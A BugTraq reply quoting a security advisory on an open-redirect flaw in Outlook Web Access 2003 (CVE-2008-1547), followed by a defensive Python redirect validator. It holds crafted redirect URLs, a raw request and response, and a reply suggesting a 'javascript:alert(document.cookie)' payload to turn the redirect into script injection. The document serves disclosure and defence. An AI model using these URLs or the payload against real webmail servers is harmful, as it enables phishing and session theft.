BugTraq
Re: MS OWA 2003 Redirection Vulnerability Oct 15 2008 05:51PM
Stefano Di Paola (stefano dipaola wisec it)
Did you try setting it to:

javascript:alert(document.cookie)

If there are no/dumb filters, you'll get

<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
try
{
window.location = "javascript:alert(document.cookie)";
}
catch(e){}
</script>
</head>
</html>

which is better than a simple redirection.

Sorry but at the moment I cannot check it by myself.

Cheers,
Stefano

On Wed, 15/10/2008 at 11.18 +0200, Martin Suess wrote:
> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product: Outlook Web Access for Exchange 2003
> # Vendor: Microsoft (www.microsoft.com)
> # CVE ID: CVE-2008-1547
> # Subject: URL Redirection Vulnerability
> # Risk: Medium
> # Effect: Remotely exploitable
> # Author: Martin Suess <martin.suess (at) csnc (dot) ch [email concealed]>
> # Date: October 15th 2008
> #
> #############################################################
>
> Introduction:
> -------------
> The vulnerability found targets the Outlook Web Access application
> for Microsoft Exchange 2003. A valid user can be redirected to a
> malicious website when clicking on a specially crafted URL which can
> be sent to the user by email. If the user is logged in,
> he is redirected instantly - if he is not logged in yet, the login page
> will be displayed and he will be redirected after successful login.
> This vulnerability can be used to redirect the user to a phishing
> website which shows the (faked) login screen and gets the user's
> logon credentials as soon as he tries to log in on the faked site.
>
> Affected:
> ---------
> - All tested versions that are vulnerable:
>   Microsoft Outlook Web Access for Exchange 2003 Server
>   (Version: 6.5, Build: 7638.2 SP2)
> - All tested versions that are not vulnerable:
>   [no more tested]
> - Not affected according to vendor:
> Microsoft Outlook Web Access for Exchange 2007 Server, SP1
>
> Technical Description:
> ----------------------
> An attacker can craft a URL for the OWA of his victim which contains a
> redirection URL to which the user is sent after successful login. This
> URL can be sent to the victim by mail to either a private address or to
> the Exchange business account. Once he clicks on the URL he is
> redirected to a malicious website an attacker prepared containing a
> faked logon screen saying "your session has expired" or similar. If the
> user tries to log in again (on the faked logon page) his credentials
> are compromised.
>
> Outlook Web Access for Exchange 2003
>
> The URL could look like this:
> https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch
>
> We request the page (authenticated user):
> GET https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch HTTP/1.1
> Host: webmail.domain.tld
> User-Agent: Mozilla/5.0 (Windows) Gecko/20080201 Firefox/2.0.0.12
> Accept: text/xml,application/xml,application/xhtml+xml
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
>
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
> Date: Fri, 28 Mar 2008 08:54:10 GMT
>
> <!--Copyright (c) 2000-2003 Microsoft Corporation. All rights reserved.-->
> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
> <html>
> <head>
> <script>
> try
> {
> window.location = "http:\/\/www.csnc.ch";
> }
> catch(e){}
> </script>
> </head>
> </html>
>
> If the user is not authorized he will be redirected automatically to
> the following URL:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=https://webmail.domain.tld/exchweb/bin/redir.asp%3FURL=http://www.csnc.ch&reason=0
>
> As soon as he authenticates successfully he is redirected to the
> foreign website as well.
>
> Outlook Web Access for Exchange 2007
>
> Nearly the same issue can be found in Outlook Web Access for Exchange
> 2007. The URL additionally contains an additional parameter C which is
> needed because otherwise the page warns that a foreign website is
> opened. If the parameter is there, we are not warned when we are
> redirected:
>
> https://webmail.domain.tld/owa/redir.aspx?C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
>
> Still, if we leave it away, it's only a pop-up which is clicked
> away and the redirection is still done.
>
> If the user is not logged on when he clicks on the specially crafted
> URL, he is also redirected to the logon screen and redirected after
> successful login (including the warning pop-up):
>
> https://webmail.domain.tld/owa/auth/logon.aspx?url=https://webmail.domain.tld/owa/redir.aspx%3FC=asdf%26URL=http%253a%252f%252fwww.csnc.ch%252f&reason=0
>
> According to Microsoft, Outlook Web Access 2007 SP1 is not affected,
> as it will not allow a link to point to inside the OWA URL namespace.
>
> Workaround / Fix:
> -----------------
> Patching the application would mean that no more redirections to
> foreign websites are allowed at all.
> A more sophisticated way of redirection would be to add a unique
> random id to each redirection URL which is connected to the session
> id and the URL. The URL does NOT contain the foreign URL anymore - it
> is only stored in the session. If the unique id does not match the URL
> stored in the session database the redirection is denied. Upon all
> redirections to foreign websites the user is warned with a pop-up.
> This does not solve the problem completely however because URLs sent
> to the webmail directly can still lead to malicious websites.
>
> As long as there is no patch available we recommend using a web entry
> server in front of Outlook Web Access which filters malicious URLs.
> Redirection URLs must always start with the FQDN of the webmail
> application:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=https://webmail.domain.tld/[...]
>
> Microsoft also states correctly that after the attack, the browser
> will no longer show the correct URL of the OWA in the address bar.
> The SSL certificate will also change or not be present anymore at
> all, depending on whether the attacker's page is encrypted or not.
>
> Timeline:
> ---------
> Vendor Status: MSRC tracking case closed
> Vendor Notified: March 31st 2008
> Vendor Response: May 6th 2008
> Advisory Release: October 15th 2008
> Patch available: - (vulnerability not high priority)
>
> Acknowledgement:
> ----------------
> -
>
> References:
> -----------
> [1]: http://www.microsoft.com/exchange/
> [2]: http://msexchangeteam.com/archive/2004/07/26/197289.aspx

--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Owasp Italy R&D Director

Web: www.wisec.it
..................
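The advisory's workaround (redirect targets must start with the webmail FQDN) and Stefano's point about the `javascript:` scheme together describe what a filter in front of `redir.asp`/`owalogon.asp` has to check. The following is an added example written for this page, not code from Microsoft, Compass Security or the thread; the hostname comes from the advisory's example URLs, while the allowed path prefixes and the `_normalise`, `is_safe_redirect` and `is_safe_redirect_chain` helpers are assumptions.

```python
from urllib.parse import parse_qs, unquote, urlsplit

WEBMAIL_HOST = "webmail.domain.tld"        # FQDN from the advisory's example URLs
ALLOWED_PREFIXES = ("/exchweb/", "/owa/")  # assumed OWA path namespaces (not from the advisory)
REDIRECT_PARAMS = {"url"}                  # redir.asp?URL=, owalogon.asp?url=, redir.aspx?URL=

def _normalise(raw):
    """Decode until stable (defeats %253a-style double encoding) and map the
    backslashes browsers treat as slashes, so we parse what the browser sees."""
    url = raw.strip()
    for _ in range(3):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url.replace("\\", "/")

def is_safe_redirect(raw_url, webmail_host=WEBMAIL_HOST):
    """True only for an https URL on the webmail host inside an OWA path."""
    url = _normalise(raw_url)
    if any(ord(c) < 0x20 for c in url):   # control chars, e.g. "java\tscript:"
        return False
    parts = urlsplit(url)
    if parts.scheme != "https":           # also refuses javascript:, data:, http:
        return False
    if parts.username is not None or parts.password is not None:
        return False                      # https://webmail.domain.tld@evil.example/
    if (parts.hostname or "") != webmail_host:
        return False
    return parts.path.startswith(ALLOWED_PREFIXES)

def is_safe_redirect_chain(raw_url, webmail_host=WEBMAIL_HOST, depth=3):
    """Validate the target and every redirect parameter nested inside it, so a
    logon URL whose url= points at redir.asp%3FURL=http://... is refused even
    though its outer URL does start with the webmail FQDN."""
    if depth == 0 or not is_safe_redirect(raw_url, webmail_host):
        return False
    query = parse_qs(urlsplit(_normalise(raw_url)).query)
    for name, values in query.items():
        if name.lower() in REDIRECT_PARAMS and not all(
            is_safe_redirect_chain(v, webmail_host, depth - 1) for v in values
        ):
            return False
    return True
```

The chain check matters because the advisory's own workaround rule is satisfied by `owalogon.asp?url=https://webmail.domain.tld/exchweb/bin/redir.asp%3FURL=http://www.csnc.ch`: the outer URL is on the webmail host, and only the nested `URL=` value leaves it.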
